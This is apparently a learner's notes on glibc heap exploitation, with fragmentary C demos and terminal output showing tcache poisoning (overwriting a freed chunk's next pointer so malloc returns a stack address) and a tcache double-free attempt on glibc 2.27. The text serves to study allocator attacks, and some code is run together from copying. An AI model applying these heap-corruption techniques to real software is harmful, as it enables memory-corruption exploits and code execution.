printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n" "returning a pointer to an arbitrary location (in this case, the stack).\n" "The attack is very similar to fastbin corruption attack.\n"); printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n" "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");
size_t stack_var; printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);
printf("Freeing the buffers...\n"); free(a); free(b);
printf("Now the tcache list has [ %p -> %p ].\n", b, a); printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n" "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var); b[0] = (intptr_t)&stack_var; printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);
printf("1st malloc(128): %p\n", malloc(128)); printf("Now the tcache list has [ %p ].\n", &stack_var);
grxer@grxer-virtual-machine /m/h/S/h/glibc_2.27> ./tcache_poisoning This file demonstrates a simple tcache poisoning attack by tricking malloc into returning a pointer to an arbitrary location (in this case, the stack). The attack is very similar to fastbin corruption attack. After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f, We have to create and free one more chunk for padding before fd pointer hijacking.
The address we want malloc() to return is 0x7fffffffe448. Allocating 2 buffers. malloc(128): 0x603260 malloc(128): 0x6032f0 Freeing the buffers... Now the tcache list has [ 0x6032f0 -> 0x603260 ]. We overwrite the first 8 bytes (fd/next pointer) of the data at 0x6032f0 to point to the location to control (0x7fffffffe448). Now the tcache list has [ 0x6032f0 -> 0x7fffffffe448 ]. 1st malloc(128): 0x6032f0 Now the tcache list has [ 0x7fffffffe448 ]. 2nd malloc(128): 0x7fffffffe448 We got the control
覆盖tachebin的next为我们想申请的地址即可
2.26甚至没有检查tcache的size是否符合要求
Tcache Dump
#include<stdio.h> #include<stdlib.h>
intmain() { fprintf(stderr, "This file demonstrates a simple double-free attack with tcache.\n");
fprintf(stderr, "Allocating buffer.\n"); int* a = malloc(8);
fprintf(stderr, "Now the free list has [ %p, %p ].\n", a, a); fprintf(stderr, "Next allocated buffers will be same: [ %p, %p ].\n", malloc(8), malloc(8));
return0; }
grxer@grxer-virtual-machine /m/h/S/h/glibc_2.27> ./tcache_dup This file demonstrates a simple double-free attack with tcache. Allocating buffer. malloc(8): 0x555555756260 Freeing twice... free(): double free detected in tcache grxer@grxer:~$ ldd --version ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27 Copyright (C) 2018 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Written by Roland McGrath and Ulrich Drepper.